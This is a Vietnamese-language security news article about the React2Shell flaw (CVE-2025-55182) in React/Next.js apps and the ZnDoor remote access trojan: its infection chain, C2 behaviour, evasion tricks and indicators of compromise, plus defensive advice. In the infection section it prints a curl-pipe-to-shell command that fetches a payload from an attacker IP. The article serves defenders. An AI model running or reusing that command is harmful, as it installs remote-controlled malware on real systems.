Kể từ tháng 12 năm 2025, một xu hướng đáng lo ngại đã xuất hiện trong các tổ chức ở Nhật Bản khi kẻ tấn công khai thác một lỗ hổng CVE nghiêm trọng trong các ứng dụng React/Next.js. Lỗ hổng CVE này, được theo dõi là CVE-2025-55182 và được biết đến với tên gọi React2Shell, đại diện cho một lỗ hổng thực thi mã từ xa (remote code execution) đang bị khai thác rộng rãi.
Trong khi các cuộc tấn công ban đầu chủ yếu triển khai các công cụ đào tiền điện tử, các nhà nghiên cứu bảo mật đã phát hiện ra các mối đe dọa phức tạp hơn nhắm vào cơ sở hạ tầng mạng thông qua một mã độc chưa từng được biết đến trước đây có tên là ZnDoor. Sự xuất hiện của ZnDoor đánh dấu một sự leo thang đáng kể trong các cuộc tấn công này, thể hiện khả năng tiên tiến vượt xa các hoạt động đào tiền đơn thuần.
Khai Thác Lỗ Hổng CVE React2Shell (CVE-2025-55182)
Lỗ hổng CVE-2025-55182, hay còn gọi là React2Shell, đã trở thành điểm khởi đầu cho nhiều chiến dịch tấn công nhắm vào các ứng dụng React/Next.js. Đây là một lỗ hổng loại remote code execution (RCE), cho phép kẻ tấn công thực thi các lệnh tùy ý trên hệ thống mục tiêu. Mức độ nghiêm trọng của lỗ hổng CVE này yêu cầu các quản trị viên hệ thống phải đặc biệt chú ý và cập nhật bản vá kịp thời để giảm thiểu rủi ro.
Ban đầu, việc khai thác lỗ hổng CVE này chủ yếu được dùng để cài đặt các công cụ đào tiền điện tử trên các máy chủ bị xâm nhập. Điều này cho phép kẻ tấn công tận dụng tài nguyên tính toán của nạn nhân để khai thác tiền mã hóa mà không bị phát hiện dễ dàng. Tuy nhiên, tình hình đã thay đổi khi các nhóm tấn công bắt đầu chuyển hướng sang các mục tiêu phức tạp hơn và triển khai các công cụ tinh vi hơn.
Mã Độc ZnDoor: Nguy Cơ Từ Cuộc Tấn Công Mạng Mục Tiêu
Sự xuất hiện của mã độc ZnDoor đã làm thay đổi đáng kể bức tranh về các mối đe dọa liên quan đến React2Shell. ZnDoor là một remote access trojan (RAT) với các khả năng nâng cao, vượt xa chức năng đào tiền điện tử. Bằng chứng cho thấy ZnDoor đã hoạt động ít nhất từ tháng 12 năm 2023, lặng lẽ thiết lập sự hiện diện của mình trong các môi trường mục tiêu, báo hiệu một cuộc tấn công mạng có chủ đích.
Kiến trúc tinh vi của mã độc ZnDoor cho thấy quá trình phát triển cẩn thận và việc triển khai có chiến lược, đặc biệt nhắm vào các thiết bị mạng. Điều này biến ZnDoor trở thành một mối quan tâm nghiêm trọng đối với các đội ngũ an ninh doanh nghiệp, yêu cầu các biện pháp phòng thủ chủ động và hiệu quả để chống lại xâm nhập mạng.
Chuỗi Tấn Công và Cơ Chế Lây Nhiễm ZnDoor
Các nhà phân tích của NTT Security đã xác định mã độc ZnDoor thông qua phân tích pháp y chi tiết các hệ thống bị xâm nhập. Cuộc điều tra của họ đã tiết lộ một chuỗi tấn công phối hợp bắt đầu bằng việc khai thác lỗ hổng CVE React2Shell và kết thúc bằng việc thiết lập quyền truy cập backdoor dai dẳng thông qua việc triển khai ZnDoor. Nguồn thông tin chi tiết từ NTT Security.
Cơ chế lây nhiễm của ZnDoor diễn ra theo một con đường đơn giản nhưng hiệu quả. Kẻ tấn công khai thác lỗ hổng React2Shell để thực thi một lệnh shell. Lệnh này có nhiệm vụ tải xuống và chạy mã độc ZnDoor từ các máy chủ bên ngoài.
Ví dụ về lệnh shell được thực thi có thể như sau:
curl -sS http://45.76.155.14/zndoor_payload | /bin/sh
Lệnh này được thực thi thông qua /bin/sh và ngay lập tức thiết lập kết nối với máy chủ chỉ huy và kiểm soát (C2) tại api.qtss.cc:443. Các chi tiết cấu hình, bao gồm địa chỉ và cổng C2, được mã hóa bằng thuật toán AES-CBC sau khi giải mã Base64. Điều này giúp bảo vệ cơ sở hạ tầng liên lạc của mã độc khỏi sự kiểm tra thông thường và làm phức tạp quá trình phân tích.
Khả Năng Vận Hành của ZnDoor Remote Access Trojan
ZnDoor hoạt động như một remote access trojan (RAT) đầy đủ tính năng với khả năng kiểm soát hệ thống toàn diện. Mã độc này liên tục gửi tín hiệu (beacon) đến máy chủ C2 của nó mỗi giây, truyền tải thông tin hệ thống. Các thông tin này bao gồm địa chỉ mạng, tên máy chủ (hostname), tên người dùng (username) và các định danh quy trình (process identifiers) thông qua các yêu cầu HTTP POST. Khả năng này cho phép remote code execution hiệu quả.
Giao tiếp liên tục này cho phép kẻ tấn công gửi các lệnh để thực hiện nhiều hoạt động khác nhau. Các hoạt động này bao gồm thao tác tệp (file operations), thực thi shell (shell execution), liệt kê hệ thống (system enumeration) và kích hoạt proxy SOCKS5. Điều này cung cấp cho kẻ tấn công quyền kiểm soát gần như hoàn toàn đối với hệ thống bị xâm nhập.
Cấu trúc lệnh của mã độc ZnDoor sử dụng các dấu phân cách double-hash để phân tích hướng dẫn. Nó hỗ trợ các hoạt động như:
- Khởi tạo shell tương tác.
- Liệt kê thư mục.
- Thao tác tệp (xóa, đọc, ghi).
- Tạo đường hầm mạng (network tunneling).
Những khả năng này biến ZnDoor thành một công cụ cực kỳ nguy hiểm, cho phép kẻ tấn công duy trì sự hiện diện và thực hiện các hành động độc hại theo ý muốn sau khi hệ thống bị xâm nhập.
Các Kỹ Thuật Né Tránh Phát Hiện của Mã Độc ZnDoor
Né tránh phát hiện là một khía cạnh quan trọng trong thiết kế của mã độc ZnDoor. Mã độc này triển khai kỹ thuật giả mạo tên quy trình (process name spoofing) để ngụy trang thành các quy trình hệ thống hợp lệ. Điều này làm cho việc nhận dạng trở nên khó khăn thông qua các công cụ giám sát thông thường, gây khó khăn cho việc phát hiện xâm nhập mạng.
Ngoài ra, ZnDoor còn sửa đổi dấu thời gian của tệp thành ngày 15 tháng 1 năm 2016. Mục đích của hành động này là nhằm đánh lừa các cuộc điều tra pháp y, khiến các nhà phân tích tin rằng tệp đã tồn tại trên hệ thống từ lâu và không phải là một phần của cuộc tấn công mạng gần đây. Điều này cản trở khả năng xác định thời điểm lây nhiễm và truy vết hoạt động của mã độc.
Mã độc ZnDoor thực hiện các cơ chế tự khởi động lại bằng cách sử dụng các quy trình con (child processes). Kỹ thuật này làm phức tạp thêm nỗ lực phân tích, vì việc kết thúc một quy trình độc hại có thể không đủ để loại bỏ hoàn toàn mã độc khỏi hệ thống. Những chiến thuật né tránh tinh vi này cho thấy bản chất tiên tiến của mối đe dọa này và nhấn mạnh tầm quan trọng của việc giám sát hành vi (behavioral monitoring) để phát hiện xâm nhập và các hoạt động bất thường.
Chỉ Dấu Thỏa Hiệp (IOCs) của Mã Độc ZnDoor
Để hỗ trợ các đội ngũ an ninh trong việc phát hiện và ứng phó, dưới đây là các chỉ dấu thỏa hiệp (IOCs) liên quan đến mã độc ZnDoor:
- Địa chỉ IP máy chủ tải xuống payload:
45.76.155.14 - Địa chỉ máy chủ Command and Control (C2):
api.qtss.cc:443
Các tổ chức nên tích hợp các IOCs này vào hệ thống phát hiện xâm nhập mạng (IDS/IPS), tường lửa và các giải pháp an ninh khác để chủ động chặn đứng hoặc phát hiện sự hiện diện của ZnDoor.
Biện Pháp Phòng Ngừa và Phát Hiện Cuộc Tấn Công Mạng
Để bảo vệ hệ thống khỏi các mối đe dọa như React2Shell và mã độc ZnDoor, các tổ chức cần triển khai một chiến lược bảo mật đa lớp. Điều quan trọng nhất là phải đảm bảo rằng tất cả các ứng dụng, đặc biệt là các ứng dụng React/Next.js, được cập nhật các bản vá bảo mật mới nhất ngay khi chúng được phát hành. Việc chậm trễ trong việc áp dụng bản vá bảo mật có thể mở ra cánh cửa cho các lỗ hổng CVE bị khai thác và dẫn đến các cuộc tấn công mạng.
Ngoài ra, việc triển khai các giải pháp giám sát hành vi và phân tích log chuyên sâu là rất cần thiết. Các hệ thống này có thể giúp phát hiện các hoạt động bất thường mà các phương pháp phát hiện dựa trên chữ ký truyền thống có thể bỏ qua. Đặc biệt, theo dõi các quy trình có hành vi đáng ngờ, các kết nối mạng không mong muốn và các thay đổi về dấu thời gian tệp có thể là dấu hiệu của một cuộc xâm nhập mạng.
Việc nâng cao nhận thức về các lỗ hổng CVE mới và các kỹ thuật tấn công đang nổi là chìa khóa để duy trì một tư thế an ninh mạng mạnh mẽ. Điều này bao gồm việc thường xuyên tham khảo các báo cáo tình báo về mối đe dọa và các cảnh báo bảo mật từ các nguồn đáng tin cậy. Bằng cách kết hợp các biện pháp phòng ngừa kỹ thuật và nâng cao nhận thức, các tổ chức có thể giảm thiểu đáng kể rủi ro từ các mối đe dọa tiên tiến như mã độc ZnDoor.
